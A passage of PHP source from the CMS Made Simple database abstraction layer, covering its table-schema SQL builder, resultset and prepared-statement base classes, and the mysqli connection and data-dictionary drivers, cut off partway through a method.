	 * @param string $flds column-name and type for the changed column.
	 * @param string $tableflds complete defintion of the new table, eg. for postgres, default ''
	 * @param array/string $tableoptions options for the new table see CreateTableSQL, default ''
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
	 */
	public function AlterColumnSQL($tabname, $flds, $tableflds='',$tableoptions='')
	{
		$tabname = $this->TableName ($tabname);
		$sql = array();
		list($lines,$pkey) = $this->_GenFields($flds);
		$alter = 'ALTER TABLE ' . $tabname . $this->alterCol . ' ';
		foreach($lines as $v) {
			$sql[] = $alter . $v;
		}
		return $sql;
	}

	/**
	 * Rename one column in a table.
	 *
	 * @param string $tabname table-name
	 * @param string $oldcolumn column-name to be renamed
	 * @param string $newcolumn new column-name
	 * @param string $flds complete column-defintion-string like for AddColumnSQL, only used by mysql atm., default=''
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
	 */
	public function RenameColumnSQL($tabname,$oldcolumn,$newcolumn,$flds='')
	{
		$tabname = $this->TableName ($tabname);
		if ($flds) {
			list($lines,$pkey) = $this->_GenFields($flds);
			$first = current($lines);
			list(,$column_def) = preg_split("/[\t ]+/",$first,2);
		}
		return array(sprintf($this->renameColumn,$tabname,$this->NameQuote($oldcolumn),$this->NameQuote($newcolumn),$column_def));
	}

	/**
	 * Drop one column from a table.
	 *
	 * @param string $tabname table-name
	 * @param string $flds column-name and type for the changed column
	 * @param string $tableflds complete defintion of the new table, eg. for postgres, default ''
	 * @param array/string $tableoptions options for the new table see CreateTableSQL, default ''
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
	 */
	public function DropColumnSQL($tabname, $flds, $tableflds='',$tableoptions='')
	{
		$tabname = $this->TableName ($tabname);
		if (!is_array($flds)) $flds = explode(',',$flds);
		$sql = array();
		$alter = 'ALTER TABLE ' . $tabname . $this->dropCol . ' ';
		foreach($flds as $v) {
			$sql[] = $alter . $this->NameQuote($v);
		}
		return $sql;
	}

    /**
     * Drop one table, and all of it's indexes
     *
     * @param string $tabname The table name to drop.
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
     */
	public function DropTableSQL($tabname)
	{
		return array (sprintf($this->dropTable, $this->TableName($tabname)));
	}

    /**
     * Rename a table.
     *
     * @param string $tabname The table name
     * @param string $newname The new table name
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
     */
	public function RenameTableSQL($tabname,$newname)
	{
		return array (sprintf($this->renameTable, $this->TableName($tabname),$this->TableName($newname)));
	}

	/**
     * Generate the SQL to create a new table.
     *
     * The flds string is a comma separated of field definitions, where each definition is of the form
     *    fieldname type columnsize otheroptions
     *
     * The type fields are codes that map to real database types as follows:
     * <dl>
     *  <dt>C</dt>
     *  <dd>Varchar, capped to 255 characters.</dd>
     *  <dt>X</dt>
     *  <dd>Text</dd>
     *  <dt>XL</dt>
     *  <dd>LongText</dd>
     *  <dt>C2</dt>
     *  <dd>Varchar, capped to 255 characters</dd>
     *  <dt>XL</dt>
     *  <dd>LongText</dd>
     *  <dt>B</dt>
     *  <dd>LongBlob</dd>
     *  <dt>D</dt>
     *  <dd>Date</dd>
     *  <dt>DT</dt>
     *  <dd>DateTime</dd>
     *  <dt>T</dt>
     *  <dd>Time</dd>
     *  <dt>TS</dt>
     *  <dd>Timestamp</dd>
     *  <dt>L</dt>
     *  <dd>TinyInt</dd>
     *  <dt>R / I4 / I</dt>
     *  <dd>Integer</dd>
     *  <dt>I1</dt>
     *  <dd>TinyInt</dd>
     *  <dt>I2</dt>
     *  <dd>SmallInt</dd>
     *  <dt>I4</dt>
     *  <dd>BigInt</dd>
     *  <dt>F</dt>
     *  <dd>Double</dd>
     *  <dt>N</dt>
     *  <dd>Numeric</dd>
     *</dl>
     *
     * The otheroptions field includes the following options:
     *<dl>
     *  <dt>AUTO</dt>
     *  <dd>Auto increment. Also sets NOTNULL.</dd>
     *  <dt>AUTOINCREMENT</dt>
     *  <dd>Same as AUTO</dd>
     *  <dt>KEY</dt>
     *  <dd>Primary key field.  Also sets NOTNULL. Compound keys are supported.</dd>
     *  <dt>PRImARY</dt>
     *  <dd>Same as KEY</dd>
     *  <dt>DEFAULT</dt>
     *  <dd>The default value.  Character strings are auto-quoted unless the string begins with a space.  i.e: ' SYSDATE '.</dd>
     *  <dt>DEF</dt>
     *  <dd>Same as DEFAULT</dd>
     *  <dt>CONSTRAINTS</dt>
     *  <dd>Additional constraints defined at the end of the field definition.</dd>
     *</dl>
     *
     * @param string $tabname The table name
     * @param string $flds a comma separated list of field definitions using datadictionary syntax.
     * @param mixed  $tableoptions A string specifying table options (database driver specific) for the table creation command.  Or an associative array of table options, keys being the database type (as available).
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
     */
	public function CreateTableSQL($tabname, $flds, $tableoptions=false)
	{
        if( $tableoptions && is_string($tableoptions)) {
            $dbtype = $this->_DBType();
            $tableoptions = [ $dbtype => $tableoptions ];
        }

        list($lines,$pkey) = $this->_GenFields($flds, true);
		$taboptions = $this->_Options($tableoptions);
		$tabname = $this->TableName ($tabname);
		$sql = $this->_TableSQL($tabname,$lines,$pkey,$taboptions);
		$tsql = $this->_Triggers($tabname,$taboptions);
		foreach($tsql as $s) $sql[] = $s;

		return $sql;
	}

    /**
     * Part of the process of parsing the datadictionary format into database specific commands.
     *
     * @internal
     */
	protected function _GenFields($flds,$widespacing=false)
	{
		if (is_string($flds)) {
			$padding = '	 ';
			$txt = $flds.$padding;
			$flds = array();
			$flds0 = Lens_ParseArgs($txt,',');
			$hasparam = false;
			foreach($flds0 as $f0) {
                if( !count($f0) ) break;
				$f1 = array();
				foreach($f0 as $token) {
					switch (strtoupper($token)) {
					case 'CONSTRAINT':
					case 'DEFAULT':
						$hasparam = $token;
						break;
					default:
						if ($hasparam) $f1[$hasparam] = $token;
						else $f1[] = $token;
						$hasparam = false;
						break;
					}
				}
				$flds[] = $f1;
			}
		}
		$this->autoIncrement = false;
		$lines = array();
		$pkey = array();
		foreach($flds as $fld) {
			$fld = _array_change_key_case($fld);
			$fname = false;
			$fdefault = false;
			$fautoinc = false;
			$ftype = false;
			$fsize = false;
			$fprec = false;
			$fprimary = false;
			$fnoquote = false;
			$fdefts = false;
			$fdefdate = false;
			$fconstraint = false;
			$fnotnull = false;
			$funsigned = false;

			//-----------------
			// Parse attributes
			foreach($fld as $attr => $v) {
				if ($attr == 2 && is_numeric($v)) $attr = 'SIZE';
				else if (is_numeric($attr) && $attr > 1 && !is_numeric($v)) $attr = strtoupper($v);
				switch($attr) {
					case '0':
					case 'NAME':
						$fname = $v;
						break;
					case '1':
					case 'TYPE':
						$ty = $v; $ftype = $this->ActualType(strtoupper($v));
						break;
					case 'SIZE':
						$dotat = strpos($v,'.');
						if ($dotat === false) $dotat = strpos($v,',');
						if ($dotat === false) $fsize = $v;
						else {
								$fsize = substr($v,0,$dotat);
								$fprec = substr($v,$dotat+1);
							}
						break;
					case 'UNSIGNED':
						$funsigned = true;
						break;
					case 'AUTOINCREMENT':
					case 'AUTO':
						$fautoinc = true;
						$fnotnull = true;
						break;
					case 'KEY':
					case 'PRIMARY':
						$fprimary = $v;
						$fnotnull = true;
						break;
					case 'DEF':
					case 'DEFAULT':
						$fdefault = $v;
						break;
					case 'NOTNULL':
						$fnotnull = $v;
						break;
					case 'NOQUOTE':
						$fnoquote = $v;
						break;
					case 'DEFDATE':
						$fdefdate = $v;
						break;
					case 'DEFTIMESTAMP':
						$fdefts = $v;
						break;
					case 'CONSTRAINT':
						$fconstraint = $v;
						break;
				}
			}

			//--------------------
			// VALIDATE FIELD INFO
			if (!strlen($fname)) {
                die('failed');
				return false;
			}

			$fid = strtoupper(preg_replace('/^`(.+)`$/', '$1', $fname));
			$fname = $this->NameQuote($fname);

			if (!strlen($ftype)) {
				return false;
			} else {
				$ftype = strtoupper($ftype);
			}

			$ftype = $this->_GetSize($ftype, $ty, $fsize, $fprec);

			if ($ty == 'X' || $ty == 'X2' || $ty == 'B') $fnotnull = false; // some blob types do not accept nulls

			if ($fprimary) $pkey[] = $fname;

			// some databases do not allow blobs to have defaults
			if ($ty == 'X') $fdefault = false;

			//--------------------
			// CONSTRUCT FIELD SQL
			if ($fdefts) {
				if (substr($this->_DbType(),0,5) == 'mysql') {
					$ftype = 'TIMESTAMP';
				} else {
					$fdefault = $this->connection->sysTimeStamp;
				}
			} else if ($fdefdate) {
				if (substr($this->_DBType(),0,5) == 'mysql') {
					$ftype = 'TIMESTAMP';
				} else {
					$fdefault = $this->connection->sysDate;
				}
			} else if ($fdefault !== false && !$fnoquote)
				if ($ty == 'C' or $ty == 'X' or
					( substr($fdefault,0,1) != "'" && !is_numeric($fdefault)))
					if (strlen($fdefault) != 1 && substr($fdefault,0,1) == ' ' && substr($fdefault,strlen($fdefault)-1) == ' ')
						$fdefault = trim($fdefault);
					else if (strtolower($fdefault) != 'null')
						$fdefault = $this->connection->qstr($fdefault);
			$suffix = $this->_CreateSuffix($fname,$ftype,$fnotnull,$fdefault,$fautoinc,$fconstraint,$funsigned);

			if ($widespacing) $fname = str_pad($fname,24);
			$lines[$fid] = $fname.' '.$ftype.$suffix;

			if ($fautoinc) $this->autoIncrement = true;
		} // foreach $flds
		return array($lines,$pkey);
	}

	/**
     * Generate the size part of the datatype.
     *
     * @ignore
     * @internal
     */
	protected function _GetSize($ftype, $ty, $fsize, $fprec)
	{
		if (strlen($fsize) && $ty != 'X' && $ty != 'B' && strpos($ftype,'(') === false) {
			$ftype .= "(".$fsize;
			if (strlen($fprec)) $ftype .= ",".$fprec;
			$ftype .= ')';
		}
		return $ftype;
	}

    /**
     * Create a suffix
     *
     * @internal
     */
	protected function _CreateSuffix($fname,$ftype,$fnotnull,$fdefault,$fautoinc,$fconstraint,$funsigned)
	{
		$suffix = '';
		if (strlen($fdefault)) $suffix .= " DEFAULT $fdefault";
		if ($fnotnull) $suffix .= ' NOT NULL';
		if ($fconstraint) $suffix .= ' '.$fconstraint;
		return $suffix;
	}

    /**
     * build SQL commands for indexes.
     *
     * @internal
     */
	protected function _IndexSQL($idxname, $tabname, $flds, $idxoptions)
	{
		$sql = array();

		if ( isset($idxoptions['REPLACE']) || isset($idxoptions['DROP']) ) {
			$sql[] = sprintf ($this->dropIndex, $idxname);
			if ( isset($idxoptions['DROP']) ) return $sql;
		}

		if ( empty ($flds) ) return $sql;

		$unique = isset($idxoptions['UNIQUE']) ? ' UNIQUE' : '';

		$s = 'CREATE' . $unique . ' INDEX ' . $idxname . ' ON ' . $tabname . ' ';

		if ( isset($idxoptions[$this->upperName]) )
			$s .= $idxoptions[$this->upperName];

		if ( is_array($flds) )	$flds = implode(', ',$flds);
		$s .= '(' . $flds . ')';
		$sql[] = $s;

		return $sql;
	}

    /**
     * A method to drop the auto increment column on a table.
     *
     * @internal
     */
	protected function _DropAutoIncrement($tabname)
	{
		return false;
	}

    /**
     * An internal method to get a list of database type specific options for a command.
     *
     * @internal
     */
    protected function get_dbtype_options($opts,$suffix = null)
    {
        $dbtype = $this->_DBType();
        $list = array($dbtype.$suffix,strtoupper($dbtype).$suffix,strtolower($dbtype).$suffix);

        foreach( $list as $one ) {
            if( isset($opts[$one]) && is_string($opts[$one]) && strlen($opts[$one]) ) return $opts[$one];
        }
    }

    /**
     * Build strings for generating tables.
     *
     * @internal
     */
	protected function _TableSQL($tabname,$lines,$pkey,$tableoptions)
	{
		$sql = array();

		if (isset($tableoptions['REPLACE']) || isset ($tableoptions['DROP'])) {
			$sql[] = sprintf($this->dropTable,$tabname);
			if ($this->autoIncrement) {
				$sInc = $this->_DropAutoIncrement($tabname);
				if ($sInc) $sql[] = $sInc;
			}
			if ( isset ($tableoptions['DROP']) ) {
				return $sql;
			}
		}
		$s = "CREATE TABLE $tabname (\n";
		$s .= implode(",\n", $lines);
		if (sizeof($pkey)>0) {
			$s .= ",\n				 PRIMARY KEY (";
			$s .= implode(", ",$pkey).")";
		}
		if (isset($tableoptions['CONSTRAINTS']))
			$s .= "\n".$tableoptions['CONSTRAINTS'];

        $str = $this->get_dbtype_options($tableoptions,'_CONSTRAINTS');
        if( $str ) $s .= "\n".$str;

		$s .= "\n)";
        $str = $this->get_dbtype_options($tableoptions);
        if( $str ) $s .= $str;
		$sql[] = $s;

		return $sql;
	}

    /**
     * Generate triggers if needed.
	 * This is used when table has auto-incrementing field that is emulated using triggers.
     *
     * @internal
     */
	protected function _Triggers($tabname,$taboptions)
	{
		return array();
	}

	/**
     * Sanitize options,
     *
     * @internal
     */
    protected function _ProcessOptions($opts)
    {
        return $opts;
    }

    /**
     * Convert options into a format usable by the system.
     *
     * @internal
     */
	protected function _Options($opts)
	{
        $opts = $this->_ProcessOptions($opts);
		if (!is_array($opts)) return array();
		$newopts = array();
		foreach($opts as $k => $v) {
			if (is_numeric($k)) $newopts[strtoupper($v)] = $v;
			else $newopts[strtoupper($k)] = $v;
		}
		return $newopts;
	}

	/**
     * Add, drop or change columns within a table.
     *
     * This function changes/adds new fields to your table. You don't
     * have to know if the col is new or not. It will check on its own.
     *
     * @param string $tablename The table name
     * @param string $flds The field definitions
     * @param array  $tableoptions Table options
     * @return string[] An array of strings suitable for use with the ExecuteSQLArray method
     */
	public function ChangeTableSQL($tablename, $flds, $tableoptions = false)
	{
		// check table exists
		$cols = $this->MetaColumns($tablename);

		if ( empty($cols)) {
			return $this->CreateTableSQL($tablename, $flds, $tableoptions);
		}

		if (is_array($flds)) {
			// Cycle through the update fields, comparing
			// existing fields to fields to update.
			// if the Metatype and size is exactly the
			// same, ignore - by Mark Newham
			$holdflds = array();
			foreach($flds as $k=>$v) {
				if ( isset($cols[$k]) && is_object($cols[$k]) ) {
					$c = $cols[$k];
					$ml = $c->max_length;
					$mt = &$this->MetaType($c->type,$ml);
					if ($ml == -1) $ml = '';
					if ($mt == 'X') $ml = $v['SIZE'];
					if (($mt != $v['TYPE']) ||  $ml != $v['SIZE']) $holdflds[$k] = $v;
				} else {
					$holdflds[$k] = $v;
				}
			}
			$flds = $holdflds;
		}

		// already exists, alter table instead
		list($lines,$pkey) = $this->_GenFields($flds);
		$alter = 'ALTER TABLE ' . $this->TableName($tablename);
		$sql = array();

		foreach ( $lines as $id => $v ) {
			if ( isset($cols[$id]) && is_object($cols[$id]) ) {
				$flds = Lens_ParseArgs($v,',');
				//  We are trying to change the size of the field, if not allowed, simply ignore the request.
				if ($flds && in_array(strtoupper(substr($flds[0][1],0,4)),$this->invalidResizeTypes4)) continue;

				$sql[] = $alter . $this->alterCol . ' ' . $v;
			} else {
				$sql[] = $alter . $this->addCol . ' ' . $v;
			}
		}
		return $sql;
	}

} // end of class
<?php

/**
 * A file to describe an empty recordset
 *
 * @ignore
 */
namespace CMSMS\Database;

/**
 * A final class to describe a special (empty) recordset.
 *
 * @ignore
 */
final class EmptyResultset extends Resultset
{
    /**
     * @ignore
     */
    public function MoveFirst() {}
    /**
     * @ignore
     */
    public function MoveNext() {}

    /**
     * @ignore
     */
    public function GetArray() {}
    /**
     * @ignore
     */
    public function GetRows() {}
    /**
     * @ignore
     */
    public function GetAll() {}
    /**
     * @ignore
     */
    public function GetAssoc() {}

    /**
     * @ignore
     */
    public function EOF() { return TRUE; }
    /**
     * @ignore
     */
    public function Close() {}
    /**
     * @ignore
     */
    public function RecordCount() { return 0; }

    /**
     * @ignore
     */
    public function fields() {}
} // end of class
<?php
#BEGIN_LICENSE
#-------------------------------------------------------------------------
# Module: \CMSMS\Database\ConnectionSpec (c) 2015 by Robert Campbell
#         (calguy1000@cmsmadesimple.org)
#  A class to define how to connect to a database.
#
#-------------------------------------------------------------------------
# CMS - CMS Made Simple is (c) 2005 by Ted Kulp (wishy@cmsmadesimple.org)
# Visit our homepage at: http://www.cmsmadesimple.org
#
#-------------------------------------------------------------------------
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# However, as a special exception to the GPL, this software is distributed
# as an addon module to CMS Made Simple.  You may not use this software
# in any Non GPL version of CMS Made simple, or in any version of CMS
# Made simple that does not indicate clearly and obviously in its admin
# section that the site was built with CMS Made simple.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Or read it online: http://www.gnu.org/licenses/licenses.html#GPL
#
#-------------------------------------------------------------------------
#END_LICENSE

/**
 * This file defines the base ResultSet class.
 *
 * @package CMS
 */

namespace CMSMS\Database;

/**
 * A class defining a resultset and how to interact with results from a database query.
 *
 * @package CMS
 * @author Robert Campbell
 * @copyright Copyright (c) 2015, Robert Campbell <calguy1000@cmsmadesimple.org>
 * @since 2.2
 * @property-read bool $EOF Test if we are at the end of the current resultset.
 * @property-read array $fields Return the current row of the resultset.
 */
abstract class Resultset
{
    /**
     * @ignore
     */
    public function __destruct()
    {
        $this->Close();
    }

    /**
     * Move to the first row in a resultset.
     */
    abstract public function MoveFirst();

    /**
     * Move to the next row of a resultset.
     */
    abstract public function MoveNext();

    /**
     * Move to a specified index of the resultset.
     *
     * @param int $idx
     */
    abstract protected function Move($idx);

    /**
     * Get all remaining results in this resultset as an array of records.
     *
     * @return array
     */
    public function GetArray()
    {
        $results = array();
        while( !$this->EOF() ) {
            $results[] = $this->fields();
            $this->MoveNext();
        }
        return $results;
    }

    /**
     * An alias for the GetArray method.
     *
     * @see GetArray()
     * @return array
     * @deprecated
     */
    public function GetRows() { return $this->GetArray(); }

    /**
     * An alias for the GetArray method.
     * @see GetArray()
     * @return array
     * @deprecated
     */
    public function GetAll() { return $this->GetArray(); }

    /**
     * Get an associative array from a resultset.
     *
     * If only two columns are returned in the resultset, the keys of the returned associative array
     * will be the value of the first column, and the value of each key will be the value from the second column.
     *
     * If more than 2 columns are returned, then the key of the returned associative array will be the
     * value from the first column, and the value of each key will be an associative array of the remaining columns.
     * This is known as array behavior.
     *
     * @deprecated
     * @param boolean force_array Force array behavior, even if there are only two columns in the resulting SQL.
     * @param boolean first2cols The opposite of force_array.  Only output the data from the first 2 columns as an associative array.
     * @return array
     */
    public function GetAssoc($force_array = false, $first2cols = false)
    {
        $data = null;
        $first_row = $this->Fields();
        if( count($first_row) < 2 ) return $data;

        $data = [];
        $keys = array_keys($first_row);
        $numeric_index = isset($row[0]);
        if( !$first2cols && (count($keys) > 2 || $force_array) ) {
            // output key is first column
            // other columns as assoc
            $first_key = $keys[0];
            while( !$this->EOF() ) {
                $row = $this->Fields();
                $data[trim($row[$first_key])] = array_slice($row,1);
                $this->MoveNext();
            }
        } else {
            // only 2 columns... output a single associative
            while( !$this->EOF() ) {
                $row = $this->Fields();
                $data[trim($row[$keys[0]])] = $row[$keys[1]];
                $this->MoveNext();
            }
        }
        return $data;
    }

    /**
     * Test if we are at the end of a resultset, and there are no further matches.
     *
     * @return bool
     */
    abstract public function EOF();

    /**
     * Close the current resultset.
     */
    abstract public function Close();

    /**
     * Return the number of rows in the current resultset.
     *
     * @return int
     */
    abstract public function RecordCount();

    /**
     * Alias for the RecordCount() method.
     *
     * @see RecordCount();
     * @return int
     */
    public function NumRows() { return $this->RecordCount(); }

    /**
     * Return the fields of the current resultset, or a single field of it.
     *
     * @param string $field An optional field name, if not specified, the entire row will be returned.
     * @return mixed|array Either a single value, or an array
     */
    abstract public function Fields( $field = null );

    /**
     * Fetch the current row, and move to the next row.
     *
     * @return array
     */
    public function FetchRow() {
        if( $this->EOF() ) return false;
        $out = $this->fields();
        $this->MoveNext();
        return $out;
    }

    /**
     * @internal
     */
    abstract protected function fetch_row();

    /**
     * @ignore
     */
    public function __get($key)
    {
        if( $key == 'EOF' ) return $this->EOF();
        if( $key == 'fields' ) return $this->Fields();
    }

}
<?php
#BEGIN_LICENSE
#-------------------------------------------------------------------------
# Module: \CMSMS\Database\Statement (c) 2015 by Robert Campbell
#         (calguy1000@cmsmadesimple.org)
#  A class to represent a prepared SQL statement
#
#-------------------------------------------------------------------------
# CMS - CMS Made Simple is (c) 2005 by Ted Kulp (wishy@cmsmadesimple.org)
# Visit our homepage at: http://www.cmsmadesimple.org
#
#-------------------------------------------------------------------------
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# However, as a special exception to the GPL, this software is distributed
# as an addon module to CMS Made Simple.  You may not use this software
# in any Non GPL version of CMS Made simple, or in any version of CMS
# Made simple that does not indicate clearly and obviously in its admin
# section that the site was built with CMS Made simple.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# Or read it online: http://www.gnu.org/licenses/licenses.html#GPL
#
#-------------------------------------------------------------------------
#END_LICENSE

/**
 * This file defines the abstract database statement class.
 *
 * @package CMS
 */

namespace CMSMS\Database;

/**
 * A class defining a prepared database statement.
 *
 * @package CMS
 * @author Robert Campbell
 * @copyright Copyright (c) 2017, Robert Campbell <calguy1000@cmsmadesimple.org>
 * @since 2.2
 * @property-read Connection $db The database connection
 * @property-read string $sql The SQL query.
 */
abstract class Statement
{
    /**
     * @ignore
     */
    private $_conn;

    /**
     * @ignore
     */
    private $_sql;

    /**
     * Constructor
     *
     * @param Connection $conn The database connection
     * @param string $sql The SQL query
     */
    public function __construct(Connection $conn,$sql = null)
    {
        $this->_conn = $conn;
        $this->_sql = $sql;
    }

    /**
     * @ignore
     */
    public function __get($key)
    {
        switch( $key ) {
        case 'db':
        case 'conn':
            return $this->_conn;

        case 'sql':
            return $this->_sql;
        }
    }

    /**
     * Bind data to the sql statements
     *
     * @param array $data An array of arrays of data representing the numerous rows of the input data.
     */
    public function Bind(array $data)
    {
        if( !is_array($data) || count($data) == 0 ) throw new \LogicException('Data passed to '.__METHOD__.' must be an associative array');
        $first = $data[0];
        if( !is_array($first) || count($first) == 0 ) throw new \LogicException('Data passed to '.__METHOD__.' must be an associative array');
        $keys = array_keys($first);
        if( is_numeric($keys[0]) && $keys[0] === 0 )  throw new \LogicException('Data passed to '.__METHOD__.' must be an associative array');

        $this->set_bound_data($data);
    }

    /**
     * Set bound data
     *
     * @see bind
     * @param array $data An array of arrays of data representing the numerous rows of the input data.
     */
    abstract protected function set_bound_data($data);

    /**
     * Test if we are at the end of the resultset.
     *
     * @return bool
     */
    abstract public function EOF();

    /**
     * Move to the first record of the resultset.
     */
    abstract public function MoveFirst();

    /**
     * Move to the next record of the resultset.
     */
    abstract public function MoveNext();

    /**
     * Retrive data fields.
     *
     * @param string $col The column name.  If not specified, all columns will be returned.
     * @return mixed
     */
    abstract public function Fields($col = null);

    /**
     * Execute the query
     */
    abstract public function Execute();
}
<?php

namespace CMSMS\Database\mysqli;

class Connection extends \CMSMS\Database\Connection
{
    private $_mysql;
    private $_in_transaction = 0;
    private $_in_smart_transaction = 0;
    private $_transaction_status = TRUE;
    private $_transaction_failed = FALSE;

    public function DbType() { return 'mysqli'; }

    public function Connect()
    {
        if( !class_exists('\mysqli') ) throw new \LogicException("Configuration error... mysqli functions are not available");

        mysqli_report(MYSQLI_REPORT_STRICT);
        try {
            $this->_mysql = new \mysqli( $this->_connectionSpec->host, $this->_connectionSpec->username,
                                         $this->_connectionSpec->password,
                                         $this->_connectionSpec->dbname,
                                         (int) $this->_connectionSpec->port );
            if( $this->_mysql->connect_error ) {
                $this->_mysql = null;
                $this->OnError(self::ERROR_CONNECT,mysqli_connect_errno(),mysqli_connect_error());
                return FALSE;
            }
            return TRUE;
        }
        catch( \Exception $e ) {
            $this->_mysql = null;
            $this->OnError(self::ERROR_CONNECT,mysqli_connect_errno(),mysqli_connect_error());
            return FALSE;
        }
    }

    public function &NewDataDictionary()
    {
        $obj = new DataDictionary($this);
        return $obj;
    }

    public function Disconnect()
    {
        if( $this->_mysql ) {
            $this->_mysql->Close();
            $this->_mysql = null;
        }
    }

    public function &get_inner_mysql()
    {
        return $this->_mysql;
    }

    public function IsConnected()
    {
        return is_object($this->_mysql);
    }

    public function ErrorMsg()
    {
        if( $this->_mysql ) return $this->_mysql->error;
        return mysqli_connect_error();
    }

    public function ErrorNo()
    {
        if( $this->_mysql ) return $this->_mysql->errno;
        return mysqli_connect_errno();
    }

    public function Affected_Rows()
    {
        return $this->_mysql->affected_rows;
    }

    public function Insert_ID()
    {
        $res =  $this->_mysql->insert_id;
        return $res;
    }

    public function qstr($str)
    {
        // note... this could be a two way tcp/ip or socket communication
        return "'".$this->_mysql->escape_string($str)."'";
    }

    public function Concat()
    {
		$arr = func_get_args();
		$list = implode(', ', $arr);

		if (strlen($list) > 0) return "CONCAT($list)";
    }

    public function IfNull( $field, $ifNull )
    {
        return " IFNULL($field, $ifNull)";
    }

    protected function do_multisql($sql)
    {
        // no error checking for this stuff
        // and no return data
        $_t = $this->_mysql->multi_query($sql);
        if( $_t ) {
            do {
                $res = $this->_mysql->store_result();
            } while( $this->_mysql->more_results() && $this->_mysql->next_result() );
        }
    }

    public function &do_sql($sql)
    {
        // execute all queries, but only need the resultset from the last one.
        $resultset = null;
        $this->sql = $sql;
        $time_start = microtime(TRUE);
        $resultid = $this->_mysql->query( $sql );
        $time_total = microtime(TRUE) - $time_start;
        $this->query_time_total += $time_total;
        if( !$resultid ) {
            $this->FailTrans();
            $this->OnError(self::ERROR_EXECUTE,$this->_mysql->errno, $this->_mysql->error);
            return $resultset;
        }
        $this->add_debug_query($sql);
        $resultset = new ResultSet( $this->_mysql, $resultid, $sql );
        return $resultset;
    }

    public function &Prepare($sql)
    {
        $stmt = new Statement($this,$sql);
        return $stmt;
    }

    public function BeginTrans()
    {
        if( $this->_in_smart_transaction ) return TRUE; // allow nesting in this case.
        $this->_in_transaction++;
        $this->_transaction_failed = FALSE;
        $this->Execute('BEGIN');
        return TRUE;
    }

    public function StartTrans()
    {
        if( $this->_in_smart_transaction ) {
            $this->_in_smart_transaction++;
            return;
        }

        if( $this->_in_transaction ) {
            $this->OnError( self::ERROR_TRANSACTION, -1, 'Bad Transaction: StartTrans called within BeginTrans');
            return FALSE;
        }
        $this->_transaction_status = TRUE;
        $this->_in_smart_transaction++;
        $this->BeginTrans();
    }

    public function RollbackTrans()
    {
        if( !$this->_in_transaction ) {
            $this->OnError( self::ERROR_TRANSACTION, -1, 'BeginTrans has not been called');
            return FALSE;
        }

        $this->_in_transaction--;
        $this->Execute('ROLLBACK');
        return TRUE;
    }

	function CommitTrans($ok=true)
	{
		if (!$ok) return $this->RollbackTrans();

        if( !$this->_in_transaction ) {
            $this->OnError( self::ERROR_TRANSACTION, -1, 'BeginTrans has not been called');
            return FALSE;
        }

        $this->_in_transaction--;
		$this->Execute('COMMIT');
		return TRUE;
	}

    public function CompleteTrans($autoComplete = true)
    {
        if( $this->_in_smart_transaction > 0 ) {
            $this->_in_smart_transaction--;
            return TRUE;
        }

        if( $this->_transaction_status && $autoComplete ) {
            if( !$this->CommitTrans() ) {
                $this->_transaction_status = FALSE;
            }
        } else {
            $this->RollbackTrans();
        }
        $this->_in_smart_transaction = 0;
        return $this->_transaction_status;
    }

    public function FailTrans()
    {
        $this->_transaction_status = FALSE;
    }

    function HasFailedTrans()
    {
        if( $this->_in_smart_transaction > 0 ) return $this->_transaction_status == FALSE;
        return FALSE;
    }

    public function GenID($seqname)
    {
        $sql = sprintf('UPDATE %s SET id=id+1;',$seqname);
        $this->Execute($sql);
        $sql = sprintf('SELECT id FROM %s',$seqname);
        return (int) $this->GetOne($sql);
    }

    public function CreateSequence($seqname,$startID=0)
    {
        $out = array();
        $startID = (int) $startID;
        $out[] = sprintf('CREATE TABLE %s (id int not null) ENGINE MyISAM',$seqname);
        $out[] = sprintf('INSERT INTO %s (id) values (%s)',$seqname,$startID);
        $dict = $this->NewDataDictionary();
        $dict->ExecuteSQLArray($out);
        return TRUE;
    }

    public function DropSequence($seqname)
    {
        return $this->Execute(sprintf('DROP TABLE %s',$seqname));
    }
} // end of class
<?php

namespace CMSMS\Database\mysqli;

class DataDictionary extends \CMSMS\Database\DataDictionary
{
  private $alterTableAddIndex;
    public function __construct(Connection $conn)
    {
        parent::__construct($conn);
        $this->alterCol = ' MODIFY COLUMN';
        $this->alterTableAddIndex = true;
        $this->dropTable = 'DROP TABLE IF EXISTS %s'; // requires mysql 3.22 or later

        $this->dropIndex = 'DROP INDEX %s ON %s';
        $this->renameColumn = 'ALTER TABLE %s CHANGE COLUMN %s %s %s';  // needs column-definition!
    }

    protected function ActualType($meta)
    {
        switch( $meta ) {
        case 'C': return 'VARCHAR';
        case 'XL':return 'LONGTEXT';
        case 'X': return 'TEXT';

        case 'C2': return 'VARCHAR';
        case 'X2': return 'LONGTEXT';

        case 'B': return 'LONGBLOB';

        case 'D': return 'DATE';
        case 'DT': return 'DATETIME';
        case 'T': return 'TIME';
        case 'TS': return 'TIMESTAMP';
        case 'L': return 'TINYINT';

        case 'R':
        case 'I4':
        case 'I': return 'INTEGER';
        case 'I1': return 'TINYINT';
        case 'I2': return 'SMALLINT';
        case 'I8': return 'BIGINT';

        case 'F': return 'DOUBLE';
        case 'N': return 'NUMERIC';
        default:
            return $meta;
        }
    }

    protected function MetaType($t,$len=-1,$fieldobj=false)
    {
        // $t can be mixed...
        if (is_object($t)) {
            $fieldobj = $t;
            $t = $fieldobj->type;
            $len = $fieldobj->max_length;
        }

        $len = -1; // mysql max_length is not accurate
